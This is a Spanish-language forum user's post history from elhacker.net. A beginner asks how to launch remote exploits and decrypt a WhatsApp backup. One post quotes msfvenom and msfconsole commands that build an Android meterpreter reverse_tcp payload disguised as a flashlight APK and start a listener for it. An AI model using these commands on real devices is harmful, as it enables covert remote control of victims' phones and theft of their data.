elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 [12]
111  Seguridad Informática / Bugs y Exploits / Re: ¿Algun exploit para ser ejecutado directamente desde el ordenador atacante? en: 19 Junio 2016, 23:38 pm


  Cuales lenguajes de programacion conoces?

Saludos

Buenas! :S el caso es que soy muy joven, hace una semana he terminado el primer curso de grado medio y no puedo esperar a aprender algo de informatica hasta que comienze el próximo curso; el caso es que no se nada de lenguaje de programación. Qué me aconsejas para comenzar? Qué busco? Dónde?. Gracias!
112  Seguridad Informática / Bugs y Exploits / ¿Algun exploit para ser ejecutado directamente desde el ordenador atacante? en: 19 Junio 2016, 23:12 pm
Hola. llevo dias comenzando a introducirme en esto de los exploits. y bueno; he podido lanzar alguno; pero me he quedado un poco insatisfecho ya que siempre tengo que ejecutar algo desde el ordenador victima. he probado a seguir cursos pero cuando hago el nmap a mis ordenadores victima (Windows7, y Windows8.1) le encuentro muy pocos puertos abiertos; y los pocos que encuentro, no encuentro informacion sobre algun exploit relacionado..
Me gustaría encontrar alguna manera de poder apreder a crear exploits remotamente. Si alguien tiene algo o sabe algo que me ayudase, agradeceria que lo comente. gracias
113  Seguridad Informática / Seguridad / DUDA: descifrar copia de seguridad whatsapp (.crypt12) en: 16 Junio 2016, 17:41 pm
Muy buenas a todos. He estado investigando un poco por internet como descifrar una copia de seguridad de mensajes de whatsapp, y no he podido encontrar la respuesta.
He podido infectarme el movil con un Exploit y descargarme mi copia de seguridad, no obstante, no encuentro manera ninguna de descifrar y poder llegar a mis mensajes.
No necesito ver mis mensajes, es una cuestion de aprender mas sobre la informatica.

agradeceria si alguien sabe alguna manera.

EXTRA: Posiblemente alguna manera que se pueda hacer desde Linux.
114  Seguridad Informática / Bugs y Exploits / DUDA: Colocar IP Publica en exploit de reverse_tcp (MSFVENOM) en: 16 Junio 2016, 17:36 pm
Hola a todos. Como he dicho en otro tema, y vuelvo a repetir  :rolleyes: estoy comenzando en esto de la seguridad informatica y soy muy principiante.  el caso es que he estado probando por primeravez esto de los exploits, y me ha surgido una duda. He estado probando un exploit y hay que colocar una IP y un PUERTO. La ayuda que he visto en internet, indica que colocan la IP local, no obstante, me surgio la duda, busque por internet, y me parecio leer que con la IP Publica tambien funciona, y asi puedes ejecutar el exploit en un dispositivo que no este en tu red local.
No obstante, he estado probando y no me ha funcionado. Me gustaria que alguien me respondiese si esto es posible, y tanto si lo es como si no, el por que (Nunca olvidemos que la base es el aprendizaje)

Os dejo los comandos del exploit para que me podais ayudar con mas facilidad. gracias.

Citar
msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 R > /root/linterna.apk

msfconsole

msf  > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.110
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
Páginas: 1 2 3 4 5 6 7 8 9 10 11 [12]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines